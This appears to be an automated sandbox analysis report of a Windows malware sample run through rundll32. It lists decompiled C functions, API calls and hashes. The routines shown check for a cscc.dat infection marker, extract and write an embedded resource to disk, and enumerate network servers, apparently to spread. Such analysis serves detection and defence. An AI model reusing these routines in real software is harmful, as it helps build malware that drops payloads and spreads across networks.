                                                                                                          				intOrPtr _t27;
                                                                                                          				void* _t31;
                                                                                                          
                                                                                                          				_t21 = _a4;
                                                                                                          				if(_t21 != 0) {
                                                                                                          					_t31 =  *(_t21 + 4);
                                                                                                          					_t27 =  *0x4a57b88;
                                                                                                          					_v12 =  *_t21;
                                                                                                          					_v8 =  *0x4a57bb8;
                                                                                                          					_t10 =  *0x4a57b80;
                                                                                                          					_t37 = _t10;
                                                                                                          					if(_t10 == 0 || E04A49F7A(__ecx, _t37, _t31, _t10) == 0) {
                                                                                                          						_t39 = _t27;
                                                                                                          						if(_t27 == 0 || E04A498AB(_t39, _t31, _t27) == 0) {
                                                                                                          							if(_v12 != 0) {
                                                                                                          								_t16 = E04A49534(_t31, 0, 0, 0); // executed
                                                                                                          								if(_t16 != 0) {
                                                                                                          									goto L7;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							goto L7;
                                                                                                          						}
                                                                                                          					} else {
                                                                                                          						L7:
                                                                                                          						E04A46B5F(_t31, _v8, 0);
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 0, _t31);
                                                                                                          					HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                          				}
                                                                                                          				return 0;
                                                                                                          			}










                                                                                                          0x04a4a11c
                                                                                                          0x04a4a123
                                                                                                          0x04a4a127
                                                                                                          0x04a4a12a
                                                                                                          0x04a4a130
                                                                                                          0x04a4a139
                                                                                                          0x04a4a13d
                                                                                                          0x04a4a142
                                                                                                          0x04a4a144
                                                                                                          0x04a4a151
                                                                                                          0x04a4a153
                                                                                                          0x04a4a166
                                                                                                          0x04a4a16c
                                                                                                          0x04a4a173
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a173
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4a175
                                                                                                          0x04a4a175
                                                                                                          0x04a4a17d
                                                                                                          0x04a4a17d
                                                                                                          0x04a4a194
                                                                                                          0x04a4a19c
                                                                                                          0x04a4a19c
                                                                                                          0x04a4a1a6

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A4A18B
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4A194
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 04A4A199
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4A19C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3859560861-0
                                                                                                          • Opcode ID: 71467cfe6a71417db465977e9230da3848d9b69e325b1b00408988f4c68ab825
                                                                                                          • Instruction ID: bef71d3abf008325b8659d2ffb085767fb104ecac7a8aac9c2086af1657d68c3
                                                                                                          • Opcode Fuzzy Hash: 71467cfe6a71417db465977e9230da3848d9b69e325b1b00408988f4c68ab825
                                                                                                          • Instruction Fuzzy Hash: 05117C7A6413156BE710AB69AD40F6F779CEBD9760F040529FD04E7240E724ED068AB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 91%
                                                                                                          			E04A47E8E(void* __ecx, void* __eflags) {
                                                                                                          				void* _v8;
                                                                                                          				void* _v12;
                                                                                                          				short _v1572;
                                                                                                          				void* __ebx;
                                                                                                          				int _t12;
                                                                                                          				signed int _t16;
                                                                                                          				void* _t20;
                                                                                                          				int _t22;
                                                                                                          				void* _t26;
                                                                                                          				int _t27;
                                                                                                          
                                                                                                          				_t26 = __ecx;
                                                                                                          				_t27 = 0;
                                                                                                          				if(E04A47E69( &_v1572) == 0) {
                                                                                                          					L4:
                                                                                                          					return _t27;
                                                                                                          				}
                                                                                                          				_t12 = PathFileExistsW( &_v1572); // executed
                                                                                                          				if(_t12 != 0) {
                                                                                                          					ExitProcess(0);
                                                                                                          				}
                                                                                                          				_t16 = E04A46F7C(_t26, GetCurrentProcess());
                                                                                                          				asm("sbb eax, eax");
                                                                                                          				_t20 = E04A48313( ~( ~_t16) + 7,  &_v12,  &_v8); // executed
                                                                                                          				if(_t20 != 0) {
                                                                                                          					_t22 = E04A487E7(_v8,  &_v1572, _v12); // executed
                                                                                                          					_t27 = _t22;
                                                                                                          				}
                                                                                                          				goto L4;
                                                                                                          			}













                                                                                                          0x04a47e8e
                                                                                                          0x04a47e9f
                                                                                                          0x04a47ea8
                                                                                                          0x04a47ef7
                                                                                                          0x04a47efb
                                                                                                          0x04a47efb
                                                                                                          0x04a47eb1
                                                                                                          0x04a47eb9
                                                                                                          0x04a47efd
                                                                                                          0x04a47efd
                                                                                                          0x04a47eca
                                                                                                          0x04a47ed1
                                                                                                          0x04a47ed8
                                                                                                          0x04a47edf
                                                                                                          0x04a47eef
                                                                                                          0x04a47ef4
                                                                                                          0x04a47ef6
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A47E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04A47EA6,?), ref: 04A47E7C
                                                                                                          • PathFileExistsW.KERNELBASE(?,?), ref: 04A47EB1
                                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 04A47EC3
                                                                                                            • Part of subcall function 04A46F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04A47170,00000000,?,04A47AF8), ref: 04A46F8E
                                                                                                            • Part of subcall function 04A46F7C: GetProcAddress.KERNEL32(00000000), ref: 04A46F95
                                                                                                            • Part of subcall function 04A48313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04A4832A
                                                                                                            • Part of subcall function 04A48313: LoadResource.KERNEL32(00000000), ref: 04A48341
                                                                                                            • Part of subcall function 04A48313: LockResource.KERNEL32(00000000), ref: 04A48350
                                                                                                            • Part of subcall function 04A48313: SizeofResource.KERNEL32(00000000), ref: 04A48368
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04A48384
                                                                                                            • Part of subcall function 04A48313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04A4838D
                                                                                                            • Part of subcall function 04A48313: memcpy.MSVCRT ref: 04A4839C
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04A483B9
                                                                                                            • Part of subcall function 04A48313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A483BC
                                                                                                            • Part of subcall function 04A48313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04A4840A
                                                                                                            • Part of subcall function 04A48313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04A4840D
                                                                                                            • Part of subcall function 04A487E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04A411BB,?,?), ref: 04A487FC
                                                                                                            • Part of subcall function 04A487E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04A411BB,?,?), ref: 04A48813
                                                                                                            • Part of subcall function 04A487E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04A411BB,?,?), ref: 04A48824
                                                                                                          • ExitProcess.KERNEL32 ref: 04A47EFD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 706652641-0
                                                                                                          • Opcode ID: 56ba6e85e66e65dfb31469f3232eb3a1bb99d569a0d73e555bed1bff953143e4
                                                                                                          • Instruction ID: 40940beee1e9053793c11f8c7b6ab08bcaee790459870394db050b1e04685026
                                                                                                          • Opcode Fuzzy Hash: 56ba6e85e66e65dfb31469f3232eb3a1bb99d569a0d73e555bed1bff953143e4
                                                                                                          • Instruction Fuzzy Hash: 07F044BA90015967EF10ABF4DD45DDEB2ADEBC8344F440155E901D2540E739EF058660
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46FAF(long __ebx, long _a4, void* _a8) {
                                                                                                          				void* _t6;
                                                                                                          				int _t9;
                                                                                                          				void* _t12;
                                                                                                          				struct _OVERLAPPED* _t13;
                                                                                                          
                                                                                                          				_t13 = 0;
                                                                                                          				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                          				_t12 = _t6;
                                                                                                          				if(_t12 != 0xffffffff) {
                                                                                                          					_a4 = 0;
                                                                                                          					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
                                                                                                          					if(_t9 != 0 && __ebx == _a4) {
                                                                                                          						_t13 = 1;
                                                                                                          					}
                                                                                                          					CloseHandle(_t12);
                                                                                                          				}
                                                                                                          				return _t13;
                                                                                                          			}







                                                                                                          0x04a46fb4
                                                                                                          0x04a46fc5
                                                                                                          0x04a46fcb
                                                                                                          0x04a46fd0
                                                                                                          0x04a46fdb
                                                                                                          0x04a46fdf
                                                                                                          0x04a46fe7
                                                                                                          0x04a46fee
                                                                                                          0x04a46fee
                                                                                                          0x04a46ff0
                                                                                                          0x04a46ff0
                                                                                                          0x04a46ffb

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04A47201,?,?,?,04A47AF8), ref: 04A46FC5
                                                                                                          • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04A47201,?,?,?,04A47AF8), ref: 04A46FDF
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,04A47201,?,?,?,04A47AF8), ref: 04A46FF0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 1065093856-0
                                                                                                          • Opcode ID: 497ad13b973b15c97384018e2893dea449518938e2b3b522ff48a267f3b3e607
                                                                                                          • Instruction ID: 68875df8ec4b15b90929c3dd657075feed2e3a48448606f0b3346c1b3a921644
                                                                                                          • Opcode Fuzzy Hash: 497ad13b973b15c97384018e2893dea449518938e2b3b522ff48a267f3b3e607
                                                                                                          • Instruction Fuzzy Hash: 88F0D4352011287ADB205E6AEC48EAFBE6CEBD6BF1F108116F9098A190C635D942D6B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A487E7(long __ebx, long _a4, void* _a8) {
                                                                                                          				void* _t5;
                                                                                                          				int _t8;
                                                                                                          				void* _t11;
                                                                                                          				struct _OVERLAPPED* _t12;
                                                                                                          
                                                                                                          				_t12 = 0;
                                                                                                          				_t5 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                          				_t11 = _t5;
                                                                                                          				if(_t11 != 0xffffffff) {
                                                                                                          					_t8 = WriteFile(_t11, _a8, __ebx,  &_a4, 0); // executed
                                                                                                          					if(_t8 != 0 && _a4 == __ebx) {
                                                                                                          						_t12 = 1;
                                                                                                          					}
                                                                                                          					FindCloseChangeNotification(_t11); // executed
                                                                                                          				}
                                                                                                          				return _t12;
                                                                                                          			}







                                                                                                          0x04a487ec
                                                                                                          0x04a487fc
                                                                                                          0x04a48802
                                                                                                          0x04a48807
                                                                                                          0x04a48813
                                                                                                          0x04a4881b
                                                                                                          0x04a48822
                                                                                                          0x04a48822
                                                                                                          0x04a48824
                                                                                                          0x04a48824
                                                                                                          0x04a4882f

                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04A411BB,?,?), ref: 04A487FC
                                                                                                          • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04A411BB,?,?), ref: 04A48813
                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04A411BB,?,?), ref: 04A48824
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3805958096-0
                                                                                                          • Opcode ID: c75f027c21a216c52b04bdc9b940621a1ef35d796b365fb034c8f19b5f42d193
                                                                                                          • Instruction ID: 5a71801431289ef906222e708c7526de242efbba7ed9753327c2e0031f17966b
                                                                                                          • Opcode Fuzzy Hash: c75f027c21a216c52b04bdc9b940621a1ef35d796b365fb034c8f19b5f42d193
                                                                                                          • Instruction Fuzzy Hash: 32F0F83A201024BAD7202F6AAC48EAF7E6CEBE66F1B008129F90985050D6359942D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E04A46D35(signed int* __ebx, struct _CRITICAL_SECTION* __esi, intOrPtr* _a4) {
                                                                                                          				void* _t13;
                                                                                                          				intOrPtr _t15;
                                                                                                          				signed int* _t16;
                                                                                                          				signed int _t17;
                                                                                                          				signed int _t20;
                                                                                                          				intOrPtr* _t21;
                                                                                                          				void* _t23;
                                                                                                          				struct _CRITICAL_SECTION* _t26;
                                                                                                          
                                                                                                          				_t26 = __esi;
                                                                                                          				_t16 = __ebx;
                                                                                                          				if(__ebx == 0 || __esi == 0) {
                                                                                                          					return 0;
                                                                                                          				} else {
                                                                                                          					while(1) {
                                                                                                          						_t23 = 0;
                                                                                                          						EnterCriticalSection(_t26);
                                                                                                          						do {
                                                                                                          							_t17 =  *_t16;
                                                                                                          							if(_t17 >=  *((intOrPtr*)(_t26 + 0x24))) {
                                                                                                          								break;
                                                                                                          							}
                                                                                                          							_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)) + _t17 * 4));
                                                                                                          							_t20 =  *(_t15 + 4);
                                                                                                          							if(_t20 == 0 || (_t16[1] & _t20) != 0) {
                                                                                                          								_t21 = _a4;
                                                                                                          								_t23 = 1;
                                                                                                          								if(_t21 != 0) {
                                                                                                          									 *_t21 = _t15;
                                                                                                          								}
                                                                                                          							} else {
                                                                                                          								_t23 = 0;
                                                                                                          							}
                                                                                                          							 *_t16 = _t17 + 1;
                                                                                                          						} while (_t23 == 0);
                                                                                                          						LeaveCriticalSection(_t26);
                                                                                                          						_t13 = _t23;
                                                                                                          						if(_t23 != 0 ||  *((intOrPtr*)(_t26 + 0x28)) != 0) {
                                                                                                          							return _t13;
                                                                                                          						} else {
                                                                                                          							Sleep(0x2710); // executed
                                                                                                          							continue;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          			}











                                                                                                          0x04a46d35
                                                                                                          0x04a46d35
                                                                                                          0x04a46d3c
                                                                                                          0x04a46da1
                                                                                                          0x04a46d42
                                                                                                          0x04a46d43
                                                                                                          0x04a46d44
                                                                                                          0x04a46d46
                                                                                                          0x04a46d4c
                                                                                                          0x04a46d4c
                                                                                                          0x04a46d53
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a46d58
                                                                                                          0x04a46d5b
                                                                                                          0x04a46d60
                                                                                                          0x04a46d6b
                                                                                                          0x04a46d70
                                                                                                          0x04a46d73
                                                                                                          0x04a46d75
                                                                                                          0x04a46d75
                                                                                                          0x04a46d67
                                                                                                          0x04a46d67
                                                                                                          0x04a46d67
                                                                                                          0x04a46d78
                                                                                                          0x04a46d7a
                                                                                                          0x04a46d7f
                                                                                                          0x04a46d85
                                                                                                          0x04a46d89
                                                                                                          0x00000000
                                                                                                          0x04a46d92
                                                                                                          0x04a46d97
                                                                                                          0x00000000
                                                                                                          0x04a46d97
                                                                                                          0x04a46d89
                                                                                                          0x04a46d43

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,74714F20,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D46
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D7F
                                                                                                          • Sleep.KERNELBASE(00002710,?,04A46D1C,?,?,04A46B24,00000000,00000000,77D44620,?,?,04A4A222,00000000), ref: 04A46D97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeaveSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 1566154052-0
                                                                                                          • Opcode ID: 5c55d4a73a399025e67299197fea673340d7abc59aa5ab3dbba639b67c9e6124
                                                                                                          • Instruction ID: 873e56c54f297c96c66d5f5287d1688c49196bdd625924f49f280691e7413b4d
                                                                                                          • Opcode Fuzzy Hash: 5c55d4a73a399025e67299197fea673340d7abc59aa5ab3dbba639b67c9e6124
                                                                                                          • Instruction Fuzzy Hash: 4001D17A300E028B9B299F1AC490E3F77B6EFD7745315852CED0A8B604EB39F842C650
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A4751B(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                          				void* _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* __esi;
                                                                                                          				void** _t30;
                                                                                                          				void* _t40;
                                                                                                          				void* _t42;
                                                                                                          				intOrPtr* _t43;
                                                                                                          				void* _t44;
                                                                                                          
                                                                                                          				_t44 = 0;
                                                                                                          				_t30 =  &_v8;
                                                                                                          				_v8 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
                                                                                                          				if(_t30 == 0 || _t30 == 0xea) {
                                                                                                          					_t42 = _v8;
                                                                                                          					_a12 = 1;
                                                                                                          					if(_t42 == _t44) {
                                                                                                          						goto L16;
                                                                                                          					}
                                                                                                          					_t40 = 0;
                                                                                                          					if(_v12 <= _t44) {
                                                                                                          						L13:
                                                                                                          						goto L14;
                                                                                                          					}
                                                                                                          					_t43 = _t42 + 4;
                                                                                                          					while(_t43 != 4) {
                                                                                                          						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
                                                                                                          							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
                                                                                                          								_t44 = 0;
                                                                                                          								E04A46B95( *_t43, 0, _a4);
                                                                                                          							}
                                                                                                          						} else {
                                                                                                          							E04A4751B(_a4, 3,  *_t43);
                                                                                                          						}
                                                                                                          						_t43 = _t43 + 0x18;
                                                                                                          						_t40 = _t40 + 1;
                                                                                                          						if(_t40 < _v12) {
                                                                                                          							continue;
                                                                                                          						} else {
                                                                                                          							goto L13;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					goto L13;
                                                                                                          				} else {
                                                                                                          					_a12 = 0;
                                                                                                          					L14:
                                                                                                          					if(_v8 != _t44) {
                                                                                                          						NetApiBufferFree(_v8);
                                                                                                          					}
                                                                                                          					L16:
                                                                                                          					return _a12;
                                                                                                          				}
                                                                                                          			}













                                                                                                          0x04a47530
                                                                                                          0x04a47539
                                                                                                          0x04a47540
                                                                                                          0x04a47543
                                                                                                          0x04a47546
                                                                                                          0x04a47549
                                                                                                          0x04a4754c
                                                                                                          0x04a47554
                                                                                                          0x04a47562
                                                                                                          0x04a47565
                                                                                                          0x04a4756e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a47571
                                                                                                          0x04a47576
                                                                                                          0x04a475c0
                                                                                                          0x00000000
                                                                                                          0x04a475c0
                                                                                                          0x04a47578
                                                                                                          0x04a4757b
                                                                                                          0x04a47589
                                                                                                          0x04a475a0
                                                                                                          0x04a475b0
                                                                                                          0x04a475b2
                                                                                                          0x04a475b2
                                                                                                          0x04a4758b
                                                                                                          0x04a47592
                                                                                                          0x04a47592
                                                                                                          0x04a475b7
                                                                                                          0x04a475ba
                                                                                                          0x04a475be
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a475be
                                                                                                          0x00000000
                                                                                                          0x04a4755d
                                                                                                          0x04a4755d
                                                                                                          0x04a475c1
                                                                                                          0x04a475c4
                                                                                                          0x04a475c9
                                                                                                          0x04a475c9
                                                                                                          0x04a475cf
                                                                                                          0x04a475d5
                                                                                                          0x04a475d5

                                                                                                          APIs
                                                                                                          • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 04A4754C
                                                                                                          • NetApiBufferFree.NETAPI32(?), ref: 04A475C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BufferEnumFreeServer
                                                                                                          • String ID:
                                                                                                          • API String ID: 2429717511-0
                                                                                                          • Opcode ID: 35698008d6c3c60f0e5f1582c49dcefdd062a70313e8d8aaec04be87c4670754
                                                                                                          • Instruction ID: 60131b8ebeb310a7c03d3c7d573aff5de2ed76535630a3040c3294ade71cc62b
                                                                                                          • Opcode Fuzzy Hash: 35698008d6c3c60f0e5f1582c49dcefdd062a70313e8d8aaec04be87c4670754
                                                                                                          • Instruction Fuzzy Hash: 0C216DBA900259EFDB22CF94C940AEEBB79FFC8710F104516F815AA140E371A751DB92
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 51%
                                                                                                          			E04A47DD0(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
                                                                                                          				void* _v8;
                                                                                                          				signed int _t17;
                                                                                                          				void** _t19;
                                                                                                          				void* _t20;
                                                                                                          				signed int _t22;
                                                                                                          				signed int* _t23;
                                                                                                          				signed int* _t24;
                                                                                                          				void* _t26;
                                                                                                          				void* _t27;
                                                                                                          				signed int _t31;
                                                                                                          				signed int _t32;
                                                                                                          				signed int* _t35;
                                                                                                          				signed int* _t36;
                                                                                                          				void* _t38;
                                                                                                          				signed int _t39;
                                                                                                          				signed int _t41;
                                                                                                          				signed int _t42;
                                                                                                          
                                                                                                          				_t17 = E04A46477();
                                                                                                          				_t39 = _t17;
                                                                                                          				_t19 =  &_v8;
                                                                                                          				asm("sbb esi, esi");
                                                                                                          				_t27 = 0;
                                                                                                          				_t2 = _t39 - 0x1e; // -30
                                                                                                          				_t42 = _t41 & _t2;
                                                                                                          				_v8 = 0;
                                                                                                          				__imp__NetServerGetInfo(0, 0x65, _t19, 0x1e, _t38, _t41, _t26, __ecx); // executed
                                                                                                          				_t20 = _v8;
                                                                                                          				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
                                                                                                          					_t27 = 1;
                                                                                                          				}
                                                                                                          				if(_t20 != 0) {
                                                                                                          					NetApiBufferFree(_t20);
                                                                                                          				}
                                                                                                          				if(_t27 != 0) {
                                                                                                          					_t39 = _t39 + 0xf;
                                                                                                          				}
                                                                                                          				_t31 = 3;
                                                                                                          				_t22 = _t39 / _t31;
                                                                                                          				_t32 = 0xf;
                                                                                                          				if(_t39 <= 0x1e) {
                                                                                                          					_t12 = _t39 - 0xf; // -30
                                                                                                          					asm("sbb ecx, ecx");
                                                                                                          					_t32 = _t32 & _t12;
                                                                                                          				}
                                                                                                          				if(_t39 > 0xf) {
                                                                                                          					_t39 = 0xf;
                                                                                                          				}
                                                                                                          				_t35 = _a4;
                                                                                                          				if(_t35 != 0) {
                                                                                                          					 *_t35 = _t42;
                                                                                                          				}
                                                                                                          				_t36 = _a12;
                                                                                                          				if(_t36 != 0) {
                                                                                                          					 *_t36 = _t22;
                                                                                                          				}
                                                                                                          				_t23 = _a16;
                                                                                                          				if(_t23 != 0) {
                                                                                                          					 *_t23 = _t32;
                                                                                                          				}
                                                                                                          				_t24 = _a8;
                                                                                                          				if(_t24 != 0) {
                                                                                                          					 *_t24 = _t39;
                                                                                                          				}
                                                                                                          				return _t24;
                                                                                                          			}




















                                                                                                          0x04a47dd7
                                                                                                          0x04a47dde
                                                                                                          0x04a47de3
                                                                                                          0x04a47de7
                                                                                                          0x04a47de9
                                                                                                          0x04a47ded
                                                                                                          0x04a47df1
                                                                                                          0x04a47df3
                                                                                                          0x04a47df6
                                                                                                          0x04a47dfe
                                                                                                          0x04a47e01
                                                                                                          0x04a47e09
                                                                                                          0x04a47e09
                                                                                                          0x04a47e0c
                                                                                                          0x04a47e0f
                                                                                                          0x04a47e0f
                                                                                                          0x04a47e17
                                                                                                          0x04a47e19
                                                                                                          0x04a47e19
                                                                                                          0x04a47e1e
                                                                                                          0x04a47e23
                                                                                                          0x04a47e27
                                                                                                          0x04a47e2b
                                                                                                          0x04a47e2f
                                                                                                          0x04a47e32
                                                                                                          0x04a47e34
                                                                                                          0x04a47e34
                                                                                                          0x04a47e39
                                                                                                          0x04a47e3d
                                                                                                          0x04a47e3d
                                                                                                          0x04a47e3e
                                                                                                          0x04a47e43
                                                                                                          0x04a47e45
                                                                                                          0x04a47e45
                                                                                                          0x04a47e47
                                                                                                          0x04a47e4c
                                                                                                          0x04a47e4e
                                                                                                          0x04a47e4e
                                                                                                          0x04a47e50
                                                                                                          0x04a47e55
                                                                                                          0x04a47e57
                                                                                                          0x04a47e57
                                                                                                          0x04a47e59
                                                                                                          0x04a47e5e
                                                                                                          0x04a47e60
